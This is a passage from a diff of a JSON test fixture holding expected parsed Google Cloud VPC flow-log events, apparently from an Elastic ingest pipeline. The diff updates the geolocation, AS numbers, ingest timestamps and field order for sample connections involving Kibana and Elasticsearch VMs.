t\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565734921Z", - "end": "2019-06-14T03:49:56.316847800Z", - "id": "198begsfh44xxq", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34450, 
@@ -16488,6 +17314,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415260816Z", + "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:38.189569840Z", + "end": "2019-06-14T03:47:38.299054333Z", + "id": "198begsfh44xxz", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16499,25 +17335,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -16528,23 +17363,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392092100Z", - "original": "{\"insertId\":\"198begsfh44xxz\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34450,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:38.189569840Z", - "end": "2019-06-14T03:47:38.299054333Z", - "id": "198begsfh44xxz", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16553,11 +17379,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60122, 
@@ -16565,6 +17396,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415261353Z", + "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:39.087226326Z", + "end": "2019-06-14T03:41:39.207635184Z", + "id": "198begsfh44xxy", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16576,19 +17417,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 176 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -16599,38 +17451,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392095500Z", - "original": "{\"insertId\":\"198begsfh44xxy\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60122},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:39.087226326Z", - "end": "2019-06-14T03:41:39.207635184Z", - "id": "198begsfh44xxy", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 53879, 
@@ -16644,6 +17478,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415261858Z", + "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760414869Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "198begsfh44xxu", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16655,22 +17499,27 @@ "iana_number": "6", "packets": 608, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", + "10.87.40.76", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 176 + "ms": 36 } }, "source": { 
@@ -16686,28 +17535,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392099800Z", - "original": "{\"insertId\":\"198begsfh44xxu\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53879,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"176\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760414869Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "198begsfh44xxu", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60968, 
@@ -16721,6 +17560,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415262294Z", + "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:39.653136947Z", + "end": "2019-06-14T03:43:39.777977145Z", + "id": "198begsfh44xxo", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16732,25 +17581,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -16761,23 +17609,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392104200Z", - "original": "{\"insertId\":\"198begsfh44xxo\",\"jsonPayload\":{\"bytes_sent\":\"1794\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60968,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:39.653136947Z", - "end": "2019-06-14T03:43:39.777977145Z", - "id": "198begsfh44xxo", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16786,11 +17625,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 60756, 
@@ -16798,6 +17642,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415262685Z", + "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:10.912193869Z", + "end": "2019-06-14T03:43:11.032929292Z", + "id": "198begsfh44xy0", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16809,17 +17663,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -16836,25 +17695,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 82 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392107800Z", - "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:10.912193869Z", - "end": "2019-06-14T03:43:11.032929292Z", - "id": "198begsfh44xy0", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -16863,13 +17707,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65275, 
@@ -16877,6 +17724,16 @@ "ip": "67.43.156.13", "packets": 710 }, + "event": { + "ingested": "2021-12-14T14:43:27.415263128Z", + "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565734921Z", + "end": "2019-06-14T03:49:56.316847800Z", + "id": "198begsfh44xxw", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -16888,19 +17745,27 @@ "iana_number": "6", "packets": 710, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -16911,38 +17776,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 82 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392111800Z", - "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565734921Z", - "end": "2019-06-14T03:49:56.316847800Z", - "id": "198begsfh44xxw", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 14236, 
@@ -16956,6 +17803,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415263696Z", + "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.247072525Z", + "end": "2019-06-14T03:40:09.257387426Z", + "id": "198begsfh44xy5", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -16967,43 +17824,6 @@ "iana_number": "6", "packets": 1, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.14" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392116100Z", - "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.247072525Z", - "end": "2019-06-14T03:40:09.257387426Z", - "id": "198begsfh44xy5", - "category": "network", - "type": "connection" } }, { 
